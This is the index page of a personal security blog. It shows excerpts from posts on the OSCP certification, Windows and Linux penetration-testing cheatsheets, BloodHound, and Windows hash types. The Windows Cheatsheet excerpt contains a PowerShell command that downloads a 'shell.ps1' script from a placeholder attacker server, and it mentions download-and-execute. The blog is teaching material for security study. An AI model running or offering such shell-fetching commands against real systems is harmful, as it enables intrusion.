======================
== gkourgkoutas.net ==
======================
IGs personal blog

Journey to OSCP

oscp security hacking certification
There are tons of writeups on the internet from people who completed their OSCP certification, and I guess most of them are written better than this version. But anyway… Let’s jump in. Lab As soon as you get access to the lab, you will notice a lot of machines and different networks, which you can’t access at first. There is a so called learning path1, which suggests a few easy, medium and hard machines and their respective IP addresses. Read more...

Windows Cheatsheet

security cheats tools windows powershell AD privesc
So this is the windows equivalent of my post about linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team. I also have grepable cheatsheets to download on my GitHub. Powershell Download from remote Webserver PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1." -OutFile "C:\path\file" With the following command, Powershell downloads the file and executes it immediately Read more...

Linux Cheatsheet

security linux cheats tools privesc
Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I’m fully satisfied with the results. Thus I thought I will share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired. Read more...

BloodHound Part I

security tools windows AD
What is BloodHound? BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Read more...

Windows Hashes

security windows hash
All the different types of Windows hashes can be confusing sometimes. So to clear thinks up a little bit, I wrote some Key points to help understand what most of the stuff like LM, NTLM and DCC is all about. An excellent writeup for NTLM relaying1 is from byt3bl33d3r. All the other sources2 3 4 can be found in the footnotes. Hash types LM Hashes5 Since OS/2 (ca. 1980) in use Limited character set - everything is an CAPS and a 7 char character-limit When hashing, the PW is padded to 14 characters with zeros and encrypted with DES Very easily crackable - found only in exceptions in NTDS. Read more...
1 of 3 Next Page